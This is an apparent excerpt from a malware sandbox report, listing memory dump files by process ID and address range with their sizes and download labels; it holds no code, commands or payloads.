memory/1096-146-0x000001E42AEF0000-0x000001E42AF1B000-memory.dmp

Filesize
172KB

Download
memory/1192-140-0x0000025693300000-0x000002569332B000-memory.dmp

Filesize
172KB

Download
memory/1192-141-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/1200-144-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/1200-143-0x000001FE54A30000-0x000001FE54A5B000-memory.dmp

Filesize
172KB

Download
memory/1272-153-0x0000029E55760000-0x0000029E5578B000-memory.dmp

Filesize
172KB

Download
memory/1272-154-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/1328-156-0x000001CE171D0000-0x000001CE171FB000-memory.dmp

Filesize
172KB

Download
memory/1328-157-0x00007FFD7A7F0000-0x00007FFD7A800000-memory.dmp

Filesize
64KB

Download
memory/2308-83-0x00007FFDB88E0000-0x00007FFDB899E000-memory.dmp

Filesize
760KB

Download
memory/2308-81-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2308-76-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2308-82-0x00007FFDBA770000-0x00007FFDBA965000-memory.dmp

Filesize
2.0MB

Download
memory/2308-96-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2308-78-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2308-79-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2308-77-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/2388-40-0x000000001BA30000-0x000000001BAE2000-memory.dmp

Filesize
712KB

Download
memory/2388-39-0x0000000002890000-0x00000000028E0000-memory.dmp

Filesize
320KB

Download
memory/2396-38-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

Filesize
10.8MB

Download
memory/2396-32-0x00007FFD9C520000-0x00007FFD9CFE1000-memory.dmp

Filesize
10.8MB

Download
memory/2396-31-0x0000000000890000-0x0000000000914000-memory.dmp

Filesize
528KB

Download
memory/2396-30-0x00007FFD9C523000-0x00007FFD9C525000-memory.dmp

Filesize
8KB

Download
memory/2424-572-0x00000205A1AF0000-0x00000205A1B30000-memory.dmp

Filesize
256KB

Download
memory/3396-41-0x00007FF6E0FE0000-0x00007FF6E1246000-memory.dmp

Filesize
2.4MB

Download
memory/3396-161-0x00007FF6E0FE0000-0x00007FF6E1246000-memory.dmp

Filesize
2.4MB

Download
memory/4700-475-0x0000017771E90000-0x0000017771E9A000-memory.dmp

Filesize
40KB

Download
memory/4700-473-0x0000017771E40000-0x0000017771E46000-memory.dmp

Filesize
24KB

Download
memory/4700-136-0x0000017771B90000-0x0000017771BAC000-memory.dmp

Filesize
112KB

Download
memory/4700-437-0x0000017771E50000-0x0000017771E6C000-memory.dmp

Filesize
112KB

Download
memory/4700-472-0x0000017771E30000-0x0000017771E38000-memory.dmp

Filesize
32KB

Download
memory/4700-465-0x0000017771E70000-0x0000017771E8A000-memory.dmp

Filesize
104KB

Download
memory/4700-461-0x0000017771DF0000-0x0000017771DFA000-memory.dmp

Filesize
40KB

Download
memory/4700-149-0x0000017771BB0000-0x0000017771C65000-memory.dmp

Filesize
724KB

Download
memory/4700-163-0x0000017771C70000-0x0000017771C7A000-memory.dmp

Filesize
40KB

Download
memory/4852-47-0x000001F474D80000-0x000001F474DA2000-memory.dmp

Filesize
136KB

Download